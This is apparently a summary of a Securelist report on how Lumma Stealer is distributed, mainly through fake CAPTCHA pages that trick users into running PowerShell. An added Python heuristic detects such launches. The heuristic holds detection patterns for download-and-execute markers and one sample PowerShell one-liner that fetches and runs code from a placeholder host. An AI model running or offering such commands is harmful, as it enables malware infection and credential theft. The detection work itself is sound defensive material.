Securelist


Lumma Stealer – Tracking distribution channels

  • Lumma Stealer, introduced in 2022 by the threat actor Lumma, has gained popularity in the cybercriminal underground, with prices starting at $250.
  • Infection depends on human interaction, such as clicking links or running malicious commands, to execute the malware.
  • Lumma Stealer is distributed through various channels, including phishing emails, trojanized applications, and exploit kits.
  • One prominent distribution vector is a fake CAPTCHA scheme that tricks users into executing malicious commands.
  • The fake CAPTCHA pages are promoted on pirated media sites, adult content sites, and fake Telegram channels related to cryptocurrencies.
  • Users are deceived into clicking buttons that execute PowerShell commands, which download and install the malware.
  • Lumma Stealer employs complex infection techniques, such as DLL sideloading and injecting payloads into legitimate software, to avoid detection.
  • The malware steals sensitive data like cryptocurrency credentials, 2FA data, browser credentials, and financial information.
  • To exfiltrate stolen data, the malware disguises its communication with command-and-control servers as legitimate traffic.
  • Understanding the infection methods of Lumma Stealer is crucial for developing effective detection and prevention strategies.
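
As an added illustration (not taken from the Securelist article or this summary), the Python heuristic below flags the pattern the bullets describe: PowerShell started from a user-facing parent process with download-and-execute markers in its command line. The event field names, the parent-process list, the indicator regexes and the sample events are all assumptions constructed for this example.

```python
import re

# Assumed input: process-creation events (e.g. Sysmon Event ID 1) parsed into dicts.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Heuristic markers of a download-and-run one-liner (chosen for this example).
INDICATORS = {
    "hidden_window": re.compile(r"\s-w(in(dowstyle)?)?\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "inline_execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return the names of the indicators that fired, or [] if the event is not flagged."""
    if basename(event["image"]) not in POWERSHELL:
        return []
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    # Require two markers so that a plain interactive console is not flagged.
    return hits if len(hits) >= 2 else []

def find_suspicious(events):
    """Return (index, hits) for every flagged event."""
    return [(i, hits) for i, e in enumerate(events) if (hits := score_event(e))]

# Constructed sample events; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/v.txt)"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -c "irm https://status.example.invalid/health"'},
]

if __name__ == "__main__":
    for index, hits in find_suspicious(SAMPLE_EVENTS):
        print(index, hits)
```

Only the first sample event is flagged; the bare interactive console and the service-launched health check are not, which is the trade-off the two-marker threshold and the parent check are meant to show.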
